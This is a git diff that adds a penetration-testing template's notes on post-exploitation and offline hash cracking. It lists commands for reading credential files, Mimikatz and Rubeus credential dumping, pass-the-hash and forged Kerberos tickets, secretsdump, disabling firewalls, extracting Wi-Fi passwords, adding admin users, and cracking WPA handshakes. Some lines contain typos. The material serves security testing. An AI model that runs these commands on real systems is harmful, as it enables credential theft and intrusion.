+/boot/grub/i386-pc/password.mod
+/etc/pam.d/common-password
+/etc/pam.d/gdm-password
+/etc/pam.d/gdm-password.original
+/lib/live/config/0031-root-password
+```
+- cat /etc/profile
+- cat /etc/passwd
+- cat /etc/group
+- cat /etc/shadow
+- cat /etc/gshadow
+- cat /var/apache2/config.inc
+- cat /var/lib/mysql/mysql/user.MYD
+- cat /root/anaconda-ks.cfg
+- cat ~/.bash_history
+- cat ~/.bash_profile
+- cat ~/.bash_login
+- cat ~/.nano_history
+- cat ~/.atftp_history
+- cat ~/.mysql_history
+- cat ~/.php_history
+- ls -alh /var/mail/
+
+Sensitive Files for SSH:
+
+- find / -name authorized_keys 2> /dev/null
+- find / -name id_rsa 2> /dev/null
+
+
+
+Log Files that could help:
+
+```
+cat /etc/httpd/logs/access_log
+cat /etc/httpd/logs/access.log
+cat /etc/httpd/logs/error_log
+cat /etc/httpd/logs/error.log
+cat /var/log/apache2/access_log
+cat /var/log/apache2/access.log
+cat /var/log/apache2/error_log
+cat /var/log/apache2/error.log
+cat /var/log/apache/access_log
+cat /var/log/apache/access.log
+cat /var/log/auth.log
+cat /var/log/chttp.log
+cat /var/log/cups/error_log
+cat /var/log/dpkg.log
+cat /var/log/faillog
+cat /var/log/httpd/access_log
+cat /var/log/httpd/access.log
+cat /var/log/httpd/error_log
+cat /var/log/httpd/error.log
+cat /var/log/lastlog
+cat /var/log/lighttpd/access.log
+cat /var/log/lighttpd/error.log
+cat /var/log/lighttpd/lighttpd.access.log
+cat /var/log/lighttpd/lighttpd.error.log
+cat /var/log/messages
+cat /var/log/secure
+cat /var/log/syslog
+cat /var/log/wtmp
+cat /var/log/xferlog
+cat /var/log/yum.log
+cat /var/run/utmp
+cat /var/webmin/miniserv.log
+cat /var/www/logs/access_log
+cat /var/www/logs/access.log
+ls -alh /var/lib/dhcp3/
+ls -alh /var/log/postgresql/
+ls -alh /var/log/proftpd/
+ls -alh /var/log/samba/
+
+Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
+```
\ No 
newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md
new file mode 100644
index 0000000..743737e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md
@@ -0,0 +1,59 @@
+# Sensitive Files to look for:
+
+## Windows:
+
+```
+%windir%\repair\sam
+%windir%\System32\config\RegBack\SAM
+%windir%\repair\system
+%windir%\repair\software
+%windir%\repair\security
+%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
+%windir%\iis6.log (5,6 or 7)
+%windir%\system32\logfiles\httperr\httperr1.log
+C:\sysprep.inf
+C:\sysprep\sysprep.inf
+C:\sysprep\sysprep.xml
+%windir%\Panther\Unattended.xml
+C:\inetpub\wwwroot\Web.config
+%windir%\system32\config\AppEvent.Evt (Application log)
+%windir%\system32\config\SecEvent.Evt (Security log)
+%windir%\system32\config\default.sav
+%windir%\system32\config\security.sav
+%windir%\system32\config\software.sav
+%windir%\system32\config\system.sav
+%windir%\system32\inetsrv\config\applicationHost.config
+%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
+%windir%\System32\drivers\etc\hosts (dns entries)
+%windir%\System32\drivers\etc\networks (network settings)
+%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
+%windir%\unattend.xml
+%windir%\Windows\Panther\Unattend.xml
+%windir%\Windows\Panther\Unattend\Unattend.xml
+%windir%\Windows\system32\sysprep.inf
+%windir%\Windows\system32\sysprep\sysprep.xml
+C:\ProgramData\Configs\*
+C:\Program Files\Windows PowerShell\*
+dir c:*vnc.ini /s /b
+dir c:*ultravnc.ini /s /b
+```
+
+## Search for contents contained in a file:
+
+```
+cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
+findstr /si password *.xml *.ini *.txt *.config
+findstr /spin "password" *.*
+```
+
+## Search for a file with a certain filename:
+
+```
+dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
+where /R C:\ user.txt
+where /R C:\ *.ini
+```
+
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md
new file mode 100644
index 0000000..a980c6c
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md
@@ -0,0 +1,47 @@
+## Spawn a tty:
+
+1. rlwrap nc localhost 80
+
+2. rlwrap -r -f . nc
+
+- socat file:`tty`,raw,echo=0 tcp-listen:12345
+- /bin/sh -i
+- /bin/bash -i
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- perl -e 'exec "/bin/sh";'
+- perl: exec "/bin/sh";
+- ruby: exec "/bin/sh"
+- lua: os.execute('/bin/sh')
+
+## Priviledge Escalation Scripts:
+
+Windows:
+- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
+- Sherlock: https://github.com/rasta-mouse/Sherlock
+- Powersploit: https://github.com/PowerShellMafia/PowerSploit
+- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+- PrivescCheck: https://github.com/itm4n/PrivescCheck
+
+Linux:
+- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
+- LinEnum: https://github.com/rebootuser/LinEnum
+- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
+- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+
+## Other Resources:
+
+PowerSharpPack:
+- https://github.com/S3cur3Th1sSh1t/PowerSharpPack
+
+Windows:
+- LOLBAS: https://lolbas-project.github.io/#
+- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
+- Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
+- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
+- Watson: https://github.com/rasta-mouse/Watson
+- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
+
+Linux:
+- GTFOBins: https://gtfobins.github.io/
+- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
+- Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md
new file mode 100644
index 0000000..568f33e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md
@@ -0,0 +1,40 @@
+## Debian:
+
+- ls -alh /usr/bin/
+- ls -alh /sbin/
+- dpkg -l
+- ls -alh /var/cache/apt/archivesO
+- ls /usr/share/applications | awk -F '.desktop' ' { print $1}' -
+
+## RedHat:
+
+- rpm -qa
+- ls -alh /var/cache/yum/
+
+
+## BSD:
+
+- pkg_info
+
+## Gentoo:
+
+- equery list
+- eix -I
+
+## Arch Linux:
+
+- pacman -Q
+
+
+## Bash Script:
+
+```
+#!/bin/bash
+IFS=: read -ra dirs_in_path <<< "$PATH"
+
+for dir in "${dirs_in_path[@]}"; do
+ for file in "$dir"/*; do
+ [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}"
+ done
+done
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md
new file mode 100644
index 0000000..b432383
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md
@@ -0,0 +1,40 @@
+# PowerShell
+
+```
+Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize
+```
+
+## Obtaining a list of programs from a remote system:
+
+- ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }```
+
+## Here is a script that will pull a list of software that is installed on the users system:
+
+```
+$listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall
+
+$names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath}
+
+foreach ($name in $names)
+{
+ Write-Host $name.Displayname
+}
+```
+
+## WMI:
+
+- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ```
+
+## Reviewing Installed Windows Features
+
+- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}```
+
+# Wmic
+
+## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed:
+
+- wmic /output:C:\InstalledSoftwareList.txt product get name,version
+
+## Saving it to a text file:
+
+- wmic product get name,version /format:csv > C:\InstalledSoftware.csv
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md
new file mode 100644
index 0000000..cc20009
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md
@@ -0,0 +1,11 @@
+# Generate Silver Tickets with Impacket:
+- python3 ticketer.py -nthash -domain-sid -domain -spn
+- python3 ticketer.py -aesKey -domain-sid -domain -spn
+
+# Generate Golden Tickets:
+- python3 ticketer.py -nthash -domain-sid -domain
+- python3 ticketer.py -aesKey -domain-sid -domain
+
+# Credential Access with Secretsdump
+
+- impacket-secretsdump username@target-ip -dc-ip target-ip
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md
new file mode 100644
index 0000000..c7cb78f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md
@@ -0,0 +1,50 @@
+# Mimikatz
+
+Post exploitation commands must be executed from SYSTEM level privileges.
+- mimikatz # privilege::debug
+- mimikatz # token::whoami
+- mimikatz # token::elevate
+- mimikatz # lsadump::sam
+- mimikatz # sekurlsa::logonpasswords
+
+## Pass The Hash
+
+- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
+
+## Inject generated TGS key
+
+- mimikatz # kerberos::ptt
+
+## Generating a silver ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:
+
+
+## Generating a Golden Ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes256: /user:
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes128: /user:
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:/sid: /rc4: /user:
+
+
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md
new file mode 100644
index 0000000..ee984e2
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md
@@ -0,0 +1,38 @@
+## What does the targets network look like:
+
+- /sbin/ifconfig -a
+- /sbin/ip addr
+- cat /etc/network/interfaces
+- cat /etc/sysconfig/network
+- ip addr show
+
+## Network configuration Settings:
+
+- cat /etc/resolv.conf
+- cat /etc/sysconfig/network
+- cat /etc/networks
+- iptables -L
+- hostname
+- dnsdomainname
+
+## List all current connections
+
+- lsof -i
+- lsof -i :80
+- grep 80 /etc/services
+- netstat -antup
+- netstat -antpx
+- netstat -tulpn
+- chkconfig --list
+- chkconfig --list | grep 3:on
+
+## Check the routes:
+
+- arp -e
+- route
+- route -n
+- /sbin/route -nee
+- ip route list
+
+References:
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md
new file mode 100644
index 0000000..d19d114
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md
@@ -0,0 +1,51 @@
+## List all network interfaces, IP, and DNS.
+
+- ipconfig /all
+- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
+- Get-DnsClientServerAddress -AddressFamily IPv4 | ft
+
+
+## List all current connections
+
+netstat -nao
+
+## List firewall state and current configuration
+
+- netsh advfirewall firewall dump
+- netsh firewall show state
+- netsh firewall show config
+
+# List firewall's blocked ports
+
+- $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
+
+# Disable firewall
+
+- netsh firewall set opmode disable (Older Versions of Windows)
+- netsh advfirewall set allprofiles state off
+
+## List current routing table
+
+- route print
+- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
+
+## List the ARP table
+
+- arp -A
+- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
+
+## List all network shares
+
+- net share
+
+## Wifi Passwords:
+
+Finding the SSID:
+- netsh wland show profile
+
+Obtaining the cleartext password:
+```
+netsh wlan show profile key=clear- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
+
+(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md
new file mode 100644
index 0000000..0833644
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md
@@ -0,0 +1,26 @@
+# Source
+
+- https://github.com/GhostPack/Rubeus
+
+Review the opsec notes before compiling the program in visual studio.
+
+## ASREProasting:
+
+chek for users in the current domain:
+
+- Rubeus.exe asreproast /format: /outfile:
+
+## Kerberoasting:
+
+- Rubeus.exe kerberoast /outfile:
+
+- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
+
+## Pass the key (PTK):
+
+- .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt
+
+
+## Using the ticket on a Windows target:
+
+- Rubeus.exe ptt /ticket:
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md
new file mode 100644
index 0000000..e11d78b
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md
@@ -0,0 +1,56 @@
+# Linux Commands to run:
+
+- top
+- htop
+- ps -e
+- ps aux
+- ps aux | more
+- ps aux | less
+
+# Finding processes
+
+- pgrep
+
+# Terminating a Process
+
+- kill
+- kill -9 PID
+- pkill processName
+- killall
+
+# Kill user tty/pts sessions in Linux
+
+## Commands
+
+- `w`: show who is logged on and what they are doing
+- `who`: show who is logged on
+- `tty`: show current users pseudo terminal
+- `ps -ft pts/1`: get process id for the pseudo terminal
+- `pkill`: signal process based on name and other attributes
+
+1. Check active users logged into the server with: `w`
+```
+ 16:53:37 up 23:46, 2 users, load average: 0.00, 0.00, 0.00
+USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+debian pts/1 24.69.132.96 16:45 0.00s 0.04s 0.00s w
+debain pts/2 24.69.132.96:S.0 16:35 16.00s 0.02s 0.02s /bin/bash
+```
+2. Get the PID (Process ID) of a connected terminal (tty) with: `ps -ft pts/1`
+```
+UID PID PPID C STIME TTY TIME CMD
+debian 28580 28102 0 16:45 pts/1 00:00:00 -bash
+debian 29081 28580 0 16:55 pts/1 00:00:00 ps -ft pts/1
+```
+3. Kill the process: `kill 28580`
+
+4. Alternatively use `pkill -t pts/1`
+
+# Tools to check for running processes:
+
+## pspy
+
+Source: https://github.com/DominicBreuker/pspy/releases/
+
+- pspy --help
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md
new file mode 100644
index 0000000..bd3d89c
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md
@@ -0,0 +1,11 @@
+# Check for Processes
+
+- tasklist
+- wmic process list full
+
+# In PowerShell
+- Get-Process
+- Get-Process -Name 'Notepad'
+
+List path where the process is running:
+- (Get-Process -Name 'Calculator').Path
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md
new file mode 100644
index 0000000..53cafb1
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md
@@ -0,0 +1,7 @@
+# Linux:
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md
new file mode 100644
index 0000000..5ed0440
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md
@@ -0,0 +1,16 @@
+# Windows:
+
+- schtasks
+
+## Impacket:
+
+- python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo
+
+
+# Linux:
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md
new file mode 100644
index 0000000..e2f8cea
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md
@@ -0,0 +1,22 @@
+## For all Linux Distro's:
+
+- uname -a
+- cat /etc/issue
+- cat /proc/version
+
+## PowerShell
+
+- $PSVersionTable
+
+Obtaining Systems Enviorment Variables:
+
+- Get-ChildItem -Path Env:
+
+## Debian:
+
+- dmesg | grep Linux
+
+## RedHat:
+
+- rpm -q kernel
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md
new file mode 100644
index 0000000..7f7edd4
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md
@@ -0,0 +1,9 @@
+# Command Line:
+
+- systeminfo
+
+# PowerShell
+
+- Get-ComputerInfo
+- Get-ComputerInfo -Property "*version"
+- Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md
new file mode 100644
index 0000000..3c7a65e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md
@@ -0,0 +1,29 @@
+## Enumerating Linux Users
+
+- cat /etc/passwd
+- less etc/passwd
+- getent passwd | awk -F: '{ print $1}'
+- cut -d: -f1 /etc/passwd
+- awk –F: ‘{ print $1}’ /etc/passwd
+- getent parrwd {1000..6000}
+
+## Enumerating Users Permissions
+
+- id
+- id -nG
+- getent group
+
+## Enumerating Linux Groups
+
+- groups
+- less /etc/group
+- getent groups
+- getent group | awk -F: '{ print $1}'
+
+## Creating a user in linux:
+
+- adduser afsimmons # (alt, use full path: /usr/sbin/adduser afsimmons)
+- passwd afsimmons
+- useradd -G {group-name} afsimmons
+
+- /usr/sbin/usermod -aG sudo afsimmons
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md
new file mode 100644
index 0000000..ca735d8
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md
@@ -0,0 +1,24 @@
+View your current user:
+
+- whoami
+
+View information about the current user:
+
+- net user afsimmons
+
+- net user afsimmons /domain (For a domain user)
+
+View Local Groups:
+
+- net localgroup
+- net localgroup Administrators
+
+Add a new user:
+
+- net user afsimmons enterpasswordhere /add
+
+Add a user in a localgroup:
+
+- net localgroup Administrators afsimmons
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md
new file mode 100644
index 0000000..f67139d
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md
@@ -0,0 +1 @@
+# This is a placeholder to contain all notes regarding the post-exploitation phase for each target you assess.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
new file mode 100644
index 0000000..2f697ae
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
@@ -0,0 +1,36 @@
+## Capture Handshake
+
+1. airmon-ng start wlan0
+2. airodump-ng mon0 --write capture.cap -c 11
+3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0
+
+Convert pcap files for john and hashcat
+
+/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
+/usr/sbin/hccap2john
+/usr/sbin/vncpcap2john
+/usr/sbin/wpapcap2john
+
+
+## Cracking Handshake with Aircrack
+
+- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap
+
+## Cracking Handshakes with Hashcat
+
+- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack)
+- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force)
+- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based)
+
+## Cracking Handshakes with John The Ripper
+
+Did you run hccap2john?
+
+- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+
+
+
+Other Resources:
+
+https://github.com/lgandx/PCredz
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md
new file mode 100644
index 0000000..da4de42
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md
@@ -0,0 +1,61 @@
+
+## BENCHMARK TEST (HASH TYPE)
+
+- hashcat -b -m #type
+
+## SHOW EXAMPLE HASH
+
+- hashcat -m #type --example-hashes
+
+## DICTIONARY ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt
+
+DICTIONARY + RULES ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt
+
+COMBINATION ATTACK
+
+- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt
+
+## MASK ATTACK
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
+
+HYBRID DICTIONARY + MASK
+
+- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a
+
+HYBRID MASK + DICTIONARY
+
+- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt
+
+
+## INCREMENT
+
+DEFAULT INCREMENT
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
+
+INCREMENT MINIMUM LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
+
+INCREMENT MAX LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
+
+SESSION RESTORE
+
+- hashcat -a 0 -m #type --restore --session hash.txt dict.txt
+
+
+## Cracking krb5ts Keys
+
+- hashcat -m 13100 --force
+
+## Cracking Asrep keys
+
+- hashcat -a 0 -m 18200
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/John The Ripper.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/John The Ripper.md
new file mode 100644
index 0000000..b110a6e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/John The Ripper.md @@ -0,0 +1,47 @@ +DICTIONARY ATTACK +- john --format=#type --wordlist=dict.txt hash.txt + +BRUTEFORCE ATTACK +- john --format=#type hash. txt + +MASK ATTACK +- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6 + +INCREMENTAL ATTACK +- john --incremental hash.txt + +DICTIONARY + RULES ATTACK +- john --format=#type --wordlist=dict.t + + +Other Notes: + +BENCHMARK TEST +- john --test + +SESSION NAME +- john hash.txt --session=example_name + +SESSION RESTORE +- john --restore=example_name + +SHOW CRACKED RESULTS +- john hash.txt --pot= --show + +WORDLIST GENERATION +- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt + +CRACKING SSH KEYS: + +- /usr/share/john/ssh2john.py id_rsa > hash.john +- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john + +CRACKING KRB5TGS KEYS + +- john --format=krb5tgs --wordlist= hashes.db + +## Impacket Tools: + +- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes + +If you have the NTDS.dit file and the SYSTEM hive: + +- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL + +# Linux + +Requires Root Privileges + +- cat /etc/shadow + +- cp /etc/passwd and shadow +- unshadow passwd shadow + +# OSX + +10.5-10.7 + +- dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat +/var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt + +10.8-10.12 + +- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ +0-9a-f’|xxd -p -r|plutil -convert xml1 - -o - + +# Other Resources: + +- Lsassy: https://github.com/Hackndo/lsassy \ No newline at end of file 
